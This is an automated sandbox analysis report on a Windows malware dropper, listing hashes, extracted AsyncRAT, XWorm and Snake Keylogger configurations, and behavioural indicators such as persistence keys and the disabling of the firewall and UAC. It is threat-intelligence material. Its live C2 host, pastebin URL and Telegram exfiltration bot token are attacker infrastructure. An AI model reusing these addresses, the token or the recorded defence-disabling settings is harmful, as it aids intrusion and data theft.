Analysis
max time kernel: 9s
max time network: 54s
platform: windows7_x64
resource: win7-20240704-en
resource tags: arch:x64, arch:x86, image:win7-20240704-en, locale:en-us, os:windows7-x64, system
submitted: 08-10-2024 21:23
Static task: static1
Behavioral task: behavioral1
Sample: Fello_s_Revenge.exe
Resource: win7-20240704-en
General
Target: Fello_s_Revenge.exe
Size: 18.4MB
MD5: f8e1d9b436b1d95231ae33b44c6f165c
SHA1: bd4a588b9bbcd346fd0e4818da382ca241104d17
SHA256: 23a6dc4cce379f0d6a85e0b2b09e66d0d0f370e9d610a84aa1810aab605a3976
SHA512: 963f3ca6370d36d54d9034000e33198e9cfa8d54f7c70cf67e0e9be246a30bbd2db5f927c9dbb5edfebab3e255ece6023d3a2ed72715d1842519a9d2ff45a7f6
SSDEEP: 393216:XpkQrjxkZI7X/exB5l7qqd6DqhDzeozX5dpYeewDuBnkeKyN:Xrr1kTz7qqAGdzpdFynkeKyN
Malware Config
Extracted
https://ia600100.us.archive.org/24/items/detah-note-v/DetahNoteV.txt
Extracted
asyncrat
0.5.8
Default
127.0.0.1:51848
otherwise-puzzle.gl.at.ply.gg:51848
qsSOINsibBjw
delay: 3
install: true
install_file: dwn.exe
install_folder: %AppData%
Extracted
xworm
install_file: USB.exe
pastebin_url: https://pastebin.com/raw/0GcVDftp
Extracted
snakekeylogger
https://api.telegram.org/bot7148398804:AAESLKl9fVODMrpM8H4Wkq1Zbm-83PcMLro/sendMessage?chat_id=2135869667
Signatures
Adds autorun key to be loaded by Explorer.exe on startup 2 TTPs 18 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Dhpemm32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" | Cfnoogbo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" | Dhpemm32.exe
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Epmfgo32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" | Flfpabkp.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" | Hnjbeh32.exe
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Cfnoogbo.exe
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Cpiqmlfm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" | Gqdefddb.exe
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Hjlioj32.exe
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Hnjbeh32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" | Cpiqmlfm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" | Epmfgo32.exe
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Gqdefddb.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad\Web Event Logger = "{79FEACFF-FFCE-815E-A900-316290B5B738}" | Hjlioj32.exe
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad | Flfpabkp.exe
Detect Xworm Payload 2 IoCs
resource | yara_rule
behavioral1/files/0x00050000000194ba-1823.dat | family_xworm
behavioral1/memory/1908-2018-0x00000000011E0000-0x00000000011F6000-memory.dmp | family_xworm
Modifies firewall policy service 3 TTPs 3 IoCs
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DoNotAllowExceptions = "0" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\DisableNotifications = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Snake Keylogger
Keylogger and Infostealer first seen in November 2020.
Snake Keylogger payload 2 IoCs
resource | yara_rule
behavioral1/memory/1772-3304-0x0000000000400000-0x0000000000426000-memory.dmp | family_snakekeylogger
behavioral1/memory/2060-3309-0x00000000002F0000-0x000000000036B000-memory.dmp | family_snakekeylogger
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Async RAT payload 1 IoCs
resource | yara_rule
behavioral1/files/0x0005000000019266-1320.dat | family_asyncrat
resource | yara_rule
behavioral1/files/0x0005000000018712-1301.dat | cryptone
Adds policy Run key to start application 2 TTPs 4 IoCs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | vbc.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Policies = "C:\\Windows\\system32\\install\\Svchost.exe" | vbc.exe
Key created | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run | vbc.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\Policies = "C:\\Windows\\system32\\install\\Svchost.exe" | vbc.exe
Boot or Logon Autostart Execution: Active Setup 2 TTPs 2 IoCs
Adversaries may achieve persistence by adding a Registry key to the Active Setup of the local machine.
description | ioc | Process
Key created | \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Active Setup\Installed Components\{BL4Y35X4-2J33-41K5-SC7K-135580N8OME5} | vbc.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Active Setup\Installed Components\{BL4Y35X4-2J33-41K5-SC7K-135580N8OME5}\StubPath = "C:\\Windows\\system32\\install\\Svchost.exe Restart" | vbc.exe
pid | Process
3720 | powershell.exe
1396 | powershell.exe
7104 | powershell.exe
7148 | powershell.exe
4676 | powershell.exe
3020 | powershell.exe
2040 | powershell.exe
Drops startup file 1 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Morfey.lnk | 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe
Executes dropped EXE 30 IoCs
pid | Process
2708 | 0d4c465488b6f5f760e98a15d77da181419223fdd93915e0fb90646c645b7766.exe
2808 | 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe
2732 | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
2636 | 90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe
4500 | 1955e7fe3c25216101d012eb0b33f527.exe
3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
3264 | Cfnoogbo.exe
3392 | be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe
3456 | bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe
3416 | Morfey.EXE
3544 | c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
3664 | gold.exe
1200 | Explorer.EXE
3656 | Cpiqmlfm.exe
3004 | Dhpemm32.exe
3484 | l6E.exe
1608 | Epmfgo32.exe
924 | MTLADYYASSOVESSELBRIEFDETAILS.exe
1908 | tt.exe
3344 | sloppyCatsV1.exe
3620 | Wire-transaction073921.exe
556 | Zahlungsbest_tigung.exe
3852 | Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe
3920 | OGGY.exe
3952 | lol.exe
4080 | is-PFFTE.tmp
624 | Flfpabkp.exe
3432 | Gqdefddb.exe
2232 | Hjlioj32.exe
4376 | Hnjbeh32.exe
Loads dropped DLL 52 IoCs
pid | Process
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2732 | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
2732 | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2808 | 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2808 | 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
3392 | be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe
3392 | be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe
2388 | Fello_s_Revenge.exe
3264 | Cfnoogbo.exe
3264 | Cfnoogbo.exe
3656 | Cpiqmlfm.exe
3656 | Cpiqmlfm.exe
3004 | Dhpemm32.exe
3004 | Dhpemm32.exe
3256 | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
3852 | Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe
3852 | Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe
3852 | Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
2388 | Fello_s_Revenge.exe
3852 | Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe
1608 | Epmfgo32.exe
1608 | Epmfgo32.exe
4080 | is-PFFTE.tmp
4080 | is-PFFTE.tmp
624 | Flfpabkp.exe
624 | Flfpabkp.exe
3432 | Gqdefddb.exe
3432 | Gqdefddb.exe
2232 | Hjlioj32.exe
2232 | Hjlioj32.exe
3344 | sloppyCatsV1.exe
Uses the VBS compiler for execution 1 TTPs
description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\Svc | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusOverride = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\AntiVirusDisableNotify = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallDisableNotify = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\FirewallOverride = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UpdatesDisableNotify = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Security Center\UacDisableNotify = "1" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Adds Run key to start application 2 TTPs 5 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" | Morfey.EXE
Set value (str) | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\svchost.exe\"" | bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\wininit = "C:\\Users\\Admin\\AppData\\Local\\Temp\\lol.exe" | lol.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run\HKLM = "C:\\Windows\\system32\\install\\Svchost.exe" | vbc.exe
Set value (str) | \REGISTRY\USER\S-1-5-21-3434294380-2554721341-1919518612-1000\Software\Microsoft\Windows\CurrentVersion\Run\HKCU = "C:\\Windows\\system32\\install\\Svchost.exe" | vbc.exe
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 10 IoCs
flow | ioc
32 | pastebin.com
54 | discord.com
58 | raw.githubusercontent.com
59 | discord.com
65 | raw.githubusercontent.com
34 | pastebin.com
60 | raw.githubusercontent.com
74 | bitbucket.org
75 | bitbucket.org
76 | bitbucket.org
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
23 | checkip.dyndns.org
Obfuscated Files or Information: Command Obfuscation 1 TTPs
Adversaries may obfuscate content during command execution to impede detection.
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
description | ioc | Process
File opened for modification | \??\PhysicalDrive0 | lol.exe
AutoIT Executable 1 IoCs
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral1/memory/3920-2786-0x0000000000400000-0x00000000004CA000-memory.dmp | autoit_exe
Drops file in System32 directory 30 IoCs
description | ioc | Process
File created | C:\Windows\SysWOW64\Fgpomb32.dll | Cpiqmlfm.exe
File created | C:\Windows\SysWOW64\Epmfgo32.exe | Dhpemm32.exe
File created | C:\Windows\SysWOW64\Ijppackl.dll | Cfnoogbo.exe
File opened for modification | C:\Windows\SysWOW64\Epmfgo32.exe | Dhpemm32.exe
File opened for modification | C:\Windows\SysWOW64\Flfpabkp.exe | Epmfgo32.exe
File opened for modification | C:\Windows\SysWOW64\Gqdefddb.exe | Flfpabkp.exe
File created | C:\Windows\SysWOW64\Pbihfb32.dll | Hjlioj32.exe
File opened for modification | C:\Windows\SysWOW64\Hmdhad32.exe | Hnjbeh32.exe
File created | C:\Windows\SysWOW64\install\Svchost.exe | vbc.exe
File created | C:\Windows\SysWOW64\Kkfmcc32.dll | Flfpabkp.exe
File created | C:\Windows\SysWOW64\Akgddhmc.dll | Gqdefddb.exe
File opened for modification | C:\Windows\SysWOW64\Dhpemm32.exe | Cpiqmlfm.exe
File created | C:\Windows\SysWOW64\Cfnoogbo.exe | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
File created | C:\Windows\SysWOW64\Dhpemm32.exe | Cpiqmlfm.exe
File created | C:\Windows\SysWOW64\Bpjmnknl.dll | Epmfgo32.exe
File opened for modification | C:\Windows\SysWOW64\install\Svchost.exe | vbc.exe
File opened for modification | C:\Windows\SysWOW64\Hjlioj32.exe | Gqdefddb.exe
File opened for modification | C:\Windows\SysWOW64\Cfnoogbo.exe | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
File created | C:\Windows\SysWOW64\Cpiqmlfm.exe | Cfnoogbo.exe
File created | C:\Windows\SysWOW64\Gojijh32.dll | Dhpemm32.exe
File created | C:\Windows\SysWOW64\Flfpabkp.exe | Epmfgo32.exe
File created | C:\Windows\SysWOW64\Hjlioj32.exe | Gqdefddb.exe
File created | C:\Windows\SysWOW64\Hmdhad32.exe | Hnjbeh32.exe
File created | C:\Windows\SysWOW64\Jlamphei.dll | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
File opened for modification | C:\Windows\SysWOW64\Cpiqmlfm.exe | Cfnoogbo.exe
File opened for modification | C:\Windows\SysWOW64\Anraabelsens\Hyposternal.udk | 90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe
File created | C:\Windows\SysWOW64\Gqdefddb.exe | Flfpabkp.exe
File created | C:\Windows\SysWOW64\Hnjbeh32.exe | Hjlioj32.exe
File opened for modification | C:\Windows\SysWOW64\Hnjbeh32.exe | Hjlioj32.exe
File created | C:\Windows\SysWOW64\Iplfej32.dll | Hnjbeh32.exe
Suspicious use of SetThreadContext 1 IoCs
description | pid | Process | procid_target
PID 3456 set thread context of 328 | 3456 | bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe | 48
resource | yara_rule
behavioral1/memory/3920-2786-0x0000000000400000-0x00000000004CA000-memory.dmp | upx
behavioral1/memory/3920-2057-0x0000000000400000-0x00000000004CA000-memory.dmp | upx
behavioral1/files/0x000500000001a517-3678.dat | upx
behavioral1/files/0x000500000001a50b-3674.dat | upx
behavioral1/files/0x0013000000003d6d-5416.dat | upx
Drops file in Windows directory 1 IoCs
description | ioc | Process
File opened for modification | C:\Windows\SYSTEM.INI | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
Event Triggered Execution: Installer Packages 2 TTPs 1 IoCs
pid | Process
3296 | msiexec.exe
System Location Discovery: System Language Discovery 1 TTPs 33 IoCs
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | c23c9580f06fdc862df3d80fb8dc398b666e01a523f06ffa8935a95dce4ff8f4.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | gold.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 1955e7fe3c25216101d012eb0b33f527.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | a870c320630662dc799591a755e192fdadcb7ac52caf9781f52ae3ed5fb78660N.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | WScript.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | explorer.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Fello_s_Revenge.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Dhpemm32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Epmfgo32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | l6E.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Zahlungsbest_tigung.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | be790b55b11f6502be0c8cf14f2ab4f9e97debe7e07efde26cf24f3927d791db.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | sloppyCatsV1.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Flfpabkp.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Gqdefddb.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | MTLADYYASSOVESSELBRIEFDETAILS.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | is-PFFTE.tmp
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 5fd43ae47a37af3f2975e4a9c5bb91ccbf1556e07e98ba91ba0ff25ab3a2b91f.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | 90a82defe606e51d2826265a43737130682b738241700782d7e41188475b7fb7.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Cfnoogbo.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | powershell.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Trojan.Win32.Genome.ic-9507dcec3bf5533f4a2c08baae8bc6f2c46c62d2918090aff1a7c337dc82f524.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | OGGY.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | vbc.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Hjlioj32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Hnjbeh32.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | Cpiqmlfm.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | lol.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | schtasks.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | bec705145d0fedf1bc77946f40328e8c1a00a55f41e55c1892c4fe39bac01fcaN.exe
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 2 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
624 | cmd.exe
4616 | PING.EXE
NSIS installer 2 IoCs
resource | yara_rule
behavioral1/files/0x000800000001211b-1307.dat | nsis_installer_1
behavioral1/files/0x000800000001211b-1307.dat | nsis_installer_2
Delays execution with timeout.exe 1 IoCs
pid | Process
2660 | timeout.exe
Modifies registry class 30 IoCs
description | ioc | Process
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Fgpomb32.dll" | Cpiqmlfm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" | Cpiqmlfm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" | Hjlioj32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Jlamphei.dll" | 016da9d36c37374be6d7e43e162fd9a5c64e0c465b4cecdb50a02c7b119f64b0.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" | Cfnoogbo.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" | Flfpabkp.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 | Hjlioj32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" | Hnjbeh32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 | Cpiqmlfm.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ThreadingModel = "Apartment" | Dhpemm32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 | Epmfgo32.exe
Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32\ = "C:\\Windows\\SysWow64\\Gojijh32.dll" | Dhpemm32.exe
Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{79FEACFF-FFCE-815E-A900-316290B5B738}\InProcServer32 | Flfpabkp.exe
